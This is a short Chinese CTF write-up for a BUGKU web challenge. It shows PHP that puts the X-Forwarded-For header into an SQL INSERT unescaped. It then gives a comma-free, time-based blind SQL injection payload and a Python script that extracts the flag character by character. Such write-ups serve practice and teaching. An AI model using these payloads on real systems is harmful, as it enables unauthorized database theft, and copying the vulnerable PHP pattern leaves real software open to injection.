这篇只是为了让我自己做个记录
在进行一个BUGKU的ctf:http://123.206.87.240:8002/web15/
题目给出了源码:
error_reporting(0);
function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];
}
$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
1、首先访问一下,看到就是源码里的功能,从header中获取你的ip
2、看看代码
$sql=“insert into client_ip (ip) values (’$ip’)”;
将ip插入到数据库中。
$ip_arr = explode(’,’, $ip);
这里已经把逗号去掉了。所以之后的利用不能使用逗号。
substr(,,) 这个不行了
这里用case when then else end。
思路:然后我们可以将values中的ip先闭合,然后执行其他代码。
先预测一波flag在flag表中的flag字段中。猜flag的长度。
利用:
1’ and (case when (length((select group_concat(flag) from flag))=32) then sleep(3) else 1 end))#
如果延迟了3秒后才刷新出网页说明长度正确。这里可以用python直接跑一下。
这里直接用burpsuit得出为32.,然后接下来用python跑一下flag吧。
import requests
if __name__ == '__main__':
url = "http://123.206.87.240:8002/web15/"
data = "1' and (case when (substr((select group_concat(flag) from flag) from {0} for 1)='{1}') then sleep(3) else 1 end))#"
#data_cd = "1' and (case when ((select length(flag) from flag)={0}) then sleep(3) else 1 end))#" 爆长度
flag = ""
for i in range(1,32):
for str1 in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*.":
try:
header = {'X-Forwarded-For': data.format(str(i),str1)}
requests.get(url, headers=header, timeout=2)
except requests.exceptions.ReadTimeout:
flag += str1
print flag
break
print "flag{"+flag+"}"
成功得出结果。
by pandar